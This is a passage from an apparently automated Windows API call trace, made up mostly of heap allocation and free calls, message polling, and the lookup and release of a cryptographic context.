dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0081.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0081.869] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0081.869] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0081.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0081.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb318 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0081.869] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0081.869] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0081.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0081.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb138 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.869] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0081.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0081.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0081.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0081.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb168 [0081.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0081.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb180 [0081.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb258 [0081.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb198 [0081.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb1b0 [0081.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb348 [0081.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0d8 [0081.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0081.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0081.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0081.870] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0081.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.870] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0081.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0081.871] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0081.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb258 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0081.871] PeekMessageW (in: lpMsg=0x144e55c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e55c) returned 0 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0081.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0081.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0081.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0081.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0081.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0081.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0081.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0081.871] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0081.871] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0081.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0081.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb180 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0081.872] PeekMessageW (in: lpMsg=0x144e54c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e54c) returned 0 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0081.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0081.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0081.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0081.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0081.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0081.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0081.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0081.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0081.872] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0081.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0081.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb270 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0081.873] PeekMessageW (in: lpMsg=0x144e54c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e54c) returned 0 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0081.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0081.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0081.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0081.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0081.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.873] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0081.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0081.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0081.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0081.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0081.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0081.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0081.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0081.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0081.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0081.875] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0081.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0081.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0081.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0081.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0081.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0081.875] CryptReleaseContext (hProv=0x41a41d8, dwFlags=0x0) returned 1 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb090 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0081.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0081.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0081.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0081.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0081.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0081.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0081.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 